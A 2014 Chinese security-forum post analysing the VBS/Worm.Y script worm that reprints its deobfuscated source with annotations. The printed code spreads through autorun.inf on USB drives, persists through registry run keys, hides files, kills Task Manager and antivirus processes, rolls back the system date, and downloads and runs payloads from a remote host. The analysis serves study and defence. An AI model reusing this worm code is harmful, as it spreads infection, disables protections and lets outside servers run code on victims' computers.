-
-
[原创]VBS/Worm.Y简单分析
-
发表于: 2014-4-29 15:14
-
之前没接触过VB,看了2天,死了好多脑细胞...终于把它解出来了,拿出来和大家分享一下。菜文没什么水平,新手可以看一下,共同进步
病毒名称:.vbs
病毒类型: VBS/Worm.Y
MD5: 64ea1c0e8f653984f0fde25b77f8494f
此病毒是VBS脚本病毒,多重加密,通过U盘进行传播感染,设置注册表自启动,每过一段时间运行,通过设置特定条件,进行其他恶意行为。网上下载其他恶意程序并执行。破坏系统隐藏属性。
附件密码:vbs
VBS病毒分析
病毒名称:.vbs
MD5: 64ea1c0e8f653984f0fde25b77f8494f
此病毒是VBS脚本病毒,多重加密,通过U盘进行传播感染,设置注册表自启动,每过一段时间运行,通过设置特定条件,进行其他恶意行为。网上卸载其他恶意程序并执行。破坏系统隐藏属性。
整理一下主主体代码:
j="\"
:til="SY" ‘autorun.inf中的节名
:btj=900:
vs=".vbs"
:ve=".vbe"
:cm="%comspec% /c " ‘cmd
:dfo="/u#t/"
:inf="\autorun.inf" ‘自启动文件
set ws=createobject("wscript.shell"):
set fso=createobject("scripting.filesystemobject")
set wmi=getobject("winmgmts:\\.\root\cimv2"):
set sis=wmi.execquery("select * from win32_operatingsystem")
set dc=fso.drives:
set ats=wmi.execquery("select * from win32_service where name='Schedule'")
for each atc in ats:
cat=atc.state:
next:
if cat="Stopped" then ws.run "net start ""task scheduler""",0,false
ouw=wscript.scriptfullname: 'scriptfullname
win=fso.getspecialfolder(0)&j: 'C:\WINDOWS
dir=fso.getspecialfolder(1)&j 'C:\WINDOWS\system32
tmp=fso.getspecialfolder(2)&j: 'C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp
wbe=dir&"wbem\":
mir=left(ouw,len(ouw)-len(wscript.scriptname))
cnr="\computername":
cnp="HKLM\system\currentcontrolset\control"&cnr&cnr&cnr:
cna=rr(cnp,0):
if cna="" then cna=til
wsc="wscript.exe"
csc="cscript.exe"
css=csc&" //nologo "
wsr=rn&":createobject(""wscript.shell"").run"
c=vbcrlf
'-----------------inc------------------------
'SY'[autorun]
'open=wscript.exe .\.vbs'shell\open\command=wscript.exe .\.vbs
'shell\open\default=1
inc=til&c&"[autorun]"&c&"open="&wsc&" .\"&vs&c&"shell\open\command="&wsc&" .\"&vs&c&"shell\open\default=1"
'-----------------inc------------------------
sf="shell folders\":
rop="\software\microsoft\windows\currentversion\explorer\":
dap=rr("HKCU"&rop&sf&"desktop",0)&j 'C:\Documents and Settings\Administrator\桌面\
rpa="HKLM\software\"&cna&j: 'HKLM\software\QUBY-9B3768E839\
fsp=rr("HKLM"&rop&sf&"common startup",0)&j&vs: 'C:\Documents and Settings\All Users\「开始」菜单\程序\启动\.vbs
fap=rr("HKCU"&rop&sf&"favorites",0)&j 'C:\Documents and Settings\Administrator\Favorites\
ht=ec("ivwt?56"): 'http"\\
ha=ec(":;9:7>5kw9"): '996628.cn/
hb=hl&"1;<<=6x"&hl&"r;" '|1;<<=6x|r;
hc="0dwuEpE": '0dwuEpE
hd=ec("$"+hc): '#.asp?i=
he=ec("c"+hc) 'b.asp?i=
rsp="HKLM\software\microsoft\windows\currentversion\"
rsb=rsp&"run\":rsp=rsp&"policies\explorer\run\"&cna
hip="HKCU"&rop&"advanced\showsuperhidden"
sz=lcase(fso.getfilename(wscript.fullname))
if mir=dir then sys=true
for each si in sis:
ca=si.caption:
cs=si.codeset:
cc=si.countrycode:
os=si.oslanguage:
wv=si.version:
next
if instr(wv,"5.2")<>0 then hb="w"+hb:lb="v" else if os<>2052 and cc<>86 then hb="p"+hb:lb="o" else hb="d"+hb:lb="c"
for each d in dc
if mir=d&j then ws.run "explorer "&d,3,false:bir=true
next
'判断文件路径是否在磁盘根目录或"C:\WINDOWS\system32\wbem\"或"C:\WINDOWS"下
'如果不是就退出
if bir or sys or mir=win or mir=wbe then tir=true else wscript.quit
ouc=rt(ouw,-1): '读取本身代码
ver=gv(ouw): ‘版本验证
‘如果版本验证失败,则弹出“See You”消息框,执行km函数,参数为1
‘验证成功执行km函数,参数为0,km是主要感染函数
if ver="" or not isnumeric(ver) then msgbox("See You!"):km 1 else km 0
if sys then
if sz=wsc then pr csc,-1
if pr(csc,2)=1 then wscript.quit
wscript.sleep 2000
if pr(csc,1)=0 then ws.run css&dir&ve,0,false:if pr(csc,1)=1 then wscript.quit
if rr("til",1)<>til then wr "til",til:wr "tjs",btj:wr "djs",date-1:wr "ded",0
djs=rr("djs",1):if isdate(djs) and date-cdate(djs)>50 and lb<>"o" then wr "osw",4
‘如果读取atd项注册表为1,那么删除所有计划任务
if rr("atd",1)=1 then ws.run "at /d /y",0,false:wr "atd",0
‘如果在temp文件夹存在le文件,那么执行
le=rr("dna",1):if ei(tmp&le,1) then ws.run tmp&le
cu:er 10
else
wscript.sleep 5000
if pr(wsc,2)=2 then:if rr("tjc",1)=cstr(date) then:wscript.quit:else:wr "tjc",date
if pr(csc,1)<>1 or pr(wsc,1)=0 then bf dir&ve,ouc,7:ws.run css&dir&ve,0,false
end if
if bir or sys or mir=win or mir=wbe then tir=true else wscript.quit ouc=rt(ouw,-1): '读取本身代码 ver=gv(ouw): ‘进行验证
if ver="" or not isnumeric(ver) then msgbox("See You!"):km 1 else km 0
if pr(csc,1)=0 then ws.run css&dir&ve,0,false:
function km(sw): on error resume next 'rsp=HKLM\software\microsoft\windows\currentversion\policies\explorer\run\QUBY-9B3768E839 'rpa=HKLM\software\QUBY-9B3768E839\ 'win&ve=C:\WINDOWS\.vbe 'wbe&ve=C:\WINDOWS\system32\wbem\.vbe 'dir&vs=C:\WINDOWS\system32\.vbs .如果sw为1的话,进行删除文件,把所有病毒文件都删除,然后程序退出 if sw=1 then df fsp:wr rsp,-1:wr rpa,-1:us -1:df ouw:df win&ve:df dir&ve:df wbe&ve:wscript.quit elseif sw=-1 then bf dir&vs,nec,7:ws.run dir&vs else 'hip=HKCU\software\microsoft\windows\currentversion\explorer\advanced\showsuperhidden ‘设置文件超级隐藏 ws.regwrite hip,"0","REG_DWORD":ar ouw,7 if gv(dir&ve)<>ver then bf dir&ve,ouc,7 msgbox dir&ve if gv(wbe&ve)<>ver then bf wbe&ve,ouc,7 msgbox wbe&ve ‘如果 if rr(rsp,0)<>ve then ws.regwrite rsp,ve,"REG_SZ" if rr(rsp,0)<>ve and not ei(fsp,1) then bf fsp,wsr&" """&ve&"""",0 else df fsp end if end function:
'cu函数 -感染可移动磁盘,结束任务管理器
function cu():
on error resume next
dcu=rr("tgs",1)<>cstr(date) and rr("osw",1)<>4
do
sec=second(time):if (sec mod 5)=0 then if dcu then us 1 ‘执行us函数,感染可移动磁盘,
if (sec mod 20)=0 then
km 0
min=minute(now):if (min mod 2)=0 and nn<>min and oo<>1 then nn=min:oo=gt
'gt函数 下载文件并执行,写注册表
if rr("tsw",1)=1 then execute(uc(rr("tco",1)))
end if
wscript.sleep 999
if rr(hip,0)=1 and dcu then wr "tgs",date:us -1:dcu=false
‘结束任务管理器
if pr("taskmgr.exe",1)=1 then:ws.run "at "&time+0.003&" /interactive "&ve,0,false:wr "atd",1:km 0:wscript.quit
loop:cu
:end function
function us(sw): on error resume next ‘遍历磁盘,找到类型为3 for each d in dc if d.drivetype=3 or (d.drivetype=1 and d<>"A:" and d<> "B:") then if sw=1 then ‘创建autorun.inf文件 if ei(d&inf,2) then df d&inf ‘把病毒文件复制到可移动磁盘中去 if ei(d&j&vs,1) and ei(d&inf,1) then if rt(d&inf,1)<>til then bf d&inf,inc,7:bf d&j&vs,ouc,7 else bf d&inf,inc,7:bf d&j&vs,ouc,7 end if elseif sw=-1 then:df d&inf:df d&j&vs else:bf d&j&vs,wsr&"(left(wscript.scriptfullname,3)),3"&string(10000,"'"),7:df d&inf end if end if next end function:
function rr(rna,pa): on error resume next 'rpa -> HKLM\software\QUBY-9B3768E839\ if pa=1 then rna=rpa&rna rr=ws.regread(rna) if er(0) then rr=0 end function:
function wr(rna,rda): on error resume next if rda=-1 then ws.regdelete rna else ws.regwrite rpa&rna,rda,"REG_SZ" end function:
function bf(wh,wt,da): on error resume next df wh:set i=fso.createtextfile(wh,true):i.write wt:i.close:ar wh,da:if not er(0) then bf=1 end function:
function df(wh) on error resume next ar wh,0:if ei(wh,1) then fso.deletefile(wh) if ei(wh,2) then fso.deletefolder(wh):if ei(wh,2) then ws.run cm&"rd /s /q "&wh,0,false end function
function ar(fi,cg): on error resume next if ei(fi,1) then:set ofi=fso.getfile(fi):ofi.attributes=cg:set ofi=nothing if ei(fi,2) then:set ofi=fso.getfolder(fi):ofi.attributes=cg:set ofi=nothing end function:
function ei(na,wt): on error resume next if fso.fileexists(na) and wt=1 then ei=true if fso.folderexists(na) and wt=2 then ei=true end function:
function pr(pcs,gs)
on error resume next
set pl=wmi.execquery("select * from win32_process where name='"&pcs&"'")
i=1:pr=0:for each p in pl:i=i+1
if i>abs(gs) then pr=1
if gs<0 then if p.terminate=2 and pr=1 then ws.run cm&"taskkill /f /im "&pcs&"&tskill "&left(p.name,len(p.name)-4),0,false
next
if er(0) then pr=2
end function:
function ec(wt): on error resume next for i=1 to len(wt):ec=ec+chr(asc(mid(wt,i,1))-i):next end function:
function rt(wh,li): on error resume next if ei(wh,1) then set r=fso.opentextfile(wh,1) if li<0 then rt=r.readall else i=0:do while i<li i=i+1 if not r.atendofstream then rt=r.readline else rt=0 end if loop end if r.close end if end function:
function dw(pc,fn,fu,ki):
on error resume next
ged=fso.getbasename(fn)
if instr(rr("ged",1),ged)=0 and pr(pc,1)<>0 then
‘如果结束了360,则删除rsb这项键值
if pr("360tray.exe",-1)=1 then wr rsb,-1:wscript.sleep 5000
‘结束金山
if pr("kwatch.exe",-1)=1 then wscript.sleep 5000
‘如果时间大于2007并且结束了avp.exe,则
if year(Date)>2007 and pr("avp.exe",1)=1 then
ndate=date
‘把时间减少1年
ws.run cm&"date "&date-365,0,false
wscript.sleep 10000
‘然后改过来
ws.run cm&"at "&time+0.005&" "&cm&"date "&ndate,0,false
end if
dwc=dn(tmp&fn,ht&fu,0,2000)
if ei(tmp&fn,1) and dwc=1 then
if ki=1 then pr pc,-1
ws.run tmp&fn
if not er(0) then wr "ged",ged&","&rr("ged",1):dn 0,ht+ec(hb)+he+ged,0,0:if ki=2 then km 1
end if
dw=1
end if
wscript.sleep 500
end function:
function dn(loc,web,ris,min):
on error resume next
set xp=createobject("microsoft.xmlhttp"):xp.open "get",web,0:xp.send()
if min<>0 then
if not er(0) then
df loc:set sget=createobject("adodb.stream")
sget.mode=3:sget.type=1:sget.open():sget.write(xp.responsebody):sget.savetofile loc,2
if ei(loc,1) then fsz=fso.getfile(loc).size else fsz=0
if fsz>min then
dn=1:ar loc,7:if ris=1 then ws.run loc
else
dn=0:df loc
end if
end if
end if
end function
function gt():
on error resume next
tjs=rr("tjs",1):djs=rr("djs",1):if not isnumeric(tjs) or not isdate(djs) then wr "tjs",1:wr "djs",date:djs=rr("djs",1)
‘结束掉网吧管理程序-_-
wr "tjs",tjs+1:wb=pr("clsmn.exe",1)=1 or pr("ap.exe",1)=1 or pr("pubwin.exe",1)=1
if date-cdate(djs)>5 then wr "tjs",1000:wr "djs",date-1
if (rr("tjs",1)>1000 or wb) and rr("djs",1)<>cstr(date) then
id=rr("idd",1):if wb then id=1
randomize:wscript.sleep int(rnd*(120000-1+1))+1
js=1:cd=0:do while cd<>"<script>"
if js=2 or js=4 then d2=dn(mir&til,ht+ha+hd&id&"&v="&lb&ver,0,100):cd=rt(mir&til,1)
if js=1 or js=3 then d1=dn(mir&til,ht+ec(hb)+hd&id&"&v="&lb&ver,0,100):cd=rt(mir&til,1)
js=js+1:if js>4 then
if d1=1 or d2=1 then gt=1 else wr "tjs",tjs-10:er -1
exit do
end if:loop
if ei(mir&til,1) then
set r=fso.opentextfile(mir&til,1)
cin=r.readline:dis=r.readline:dna=r.readline:dfr=r.readline:nve=r.readline:nru=r.readline
nna=r.readline:nfr=r.readline:tsw=r.readline:tco=r.readline:osw=r.readline:idd=r.readline
r.close:df mir&til:if cin="<script>" then
wr "tjs",1:wr "djs",date:wr "idd",idd:wr "dna",dna:wr "tsw",tsw:wr "tco",tco:wr "osw",osw
if ver-nve<0 or not ei(dir&ve,1) then dn dir&nna,ht&nfr&dfo&nna,nru,2000:wscript.quit
if dis=1 then if dna<>le or not ei(tmp&le,1) then df tmp&le:dn tmp&dna,ht&dfr&dfo&dna,1,1000
if dis=2 then execute(uc(dfr))
end if
end if
end if
end function:
:function gv(wh):
on error resume next
ves=rt(wh,1):if len(ves)>8 then ves=mid(ves,len(ves)-7,8):if isnumeric("&h"&ves) then gv=ub(ves)
end function:
sub hook_execute(x)
'wscript.echo x
outfile="ok.txt"
set fso=createobject("Scripting.FileSystemObject")
if (fso.fileexists(outfile)) then
set objtxt=fso.opentextfile(outfile,8,true,0)
objtxt.write x&vbcrlf
objtxt.close
execute x
else
set objtxt=fso.createtextfile(outfile,True,False)
objtxt.write x&vbcrlf
objtxt.close
execute x
end if
end sub
[峰会]看雪.第八届安全开发者峰会10月23日上海龙之梦大酒店举办!
